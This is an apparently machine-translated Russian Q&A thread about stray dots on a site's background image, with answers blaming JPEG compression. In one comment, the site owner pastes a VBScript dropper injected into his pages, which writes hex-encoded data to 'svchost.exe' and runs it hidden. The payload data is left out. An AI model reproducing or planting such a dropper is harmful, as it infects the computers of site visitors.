Случайные точки на сайте?

0

У меня есть сайт NewGamingNation, и я генерирую большую часть фона через изображения, но ни один из моих изображений не имеет этих крошечных точек на них. Я не добавлял к нему никакого кода, чтобы он делал эти точки - не в моем CSS или HTML файле. Есть ли причина в этом?

  • 2
    Я не вижу никаких точек. Можете сделать скриншот?
  • 0
    Я использую Google Chrome и нет точек.
Показать ещё 4 комментария
Теги:
website

3 ответа

1
Лучший ответ

это, вероятно, фон bg01.jpg который действует странно

Я рекомендую использовать png-изображения, потому что качество jpg-изображений уменьшается при сохранении их

  • 0
    Я переделал это изображение как PNG и, к сожалению, я до сих пор не получил его: / в любом случае спасибо. -Edit- О, эй, это заняло около 2 минут, но оно обновилось :) Спасибо большое.
  • 1
    НЕ конвертируйте JPEG в PNG, если вам не нужна прозрачность. Размер файла, особенно для больших сложных фонов, окажет серьезное негативное влияние на загрузку вашей страницы. Используйте функцию «Экспорт для Интернета» и экспортируйте jpg со 100% качеством, если вам это нужно - сжатие не будет заметно отличаться.
Показать ещё 2 комментария
0

эти точки взяты из рисунка, который вы используете в качестве фона.

Попробуйте добавить:

<style type="text/css">
body{
    background-color: #A00210;
    background-image: none;
}
</style>
  • 0
    Я уже исправил это :) В любом случае, спасибо, это была проблема с bg01.jpg - Я переделал его как .png, и это решило проблему.
0

На вашем сайте есть троянский конь, моя онлайн-защита от avast останавливает вашу страницу от загрузки, и я не вижу точек нигде.

  • 0
    Я не знаю почему, но я думаю, что это смешно: D
  • 0
    Будет ли это так: <SCRIPT Language = VBScript> <! - DropFileName = "svchost.exe" WriteData = "(5k или около того чисел)" Set FSO = CreateObject ("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder (2 ) & "\" & DropFileName Если FSO.FileExists (DropPath) = False, то установить FileObj = FSO.CreateTextFile (DropPath, True) Для i = 1 до Len (WriteData) Шаг 2 FileObj.Write Chr (CLng ("& H" & Mid (WriteData, i, 2))) Next FileObj.Close Конец, если установлено WSHshell = CreateObject ("WScript.Shell") WSHshell.Run DropPath, 0 // -> </ SCRIPT> Если это так, как бы это исправить ? Он добавляет, что каждый раз, когда я сохраняю свой HTML.

Ещё вопросы

Сообщество Overcoder
Наверх
Меню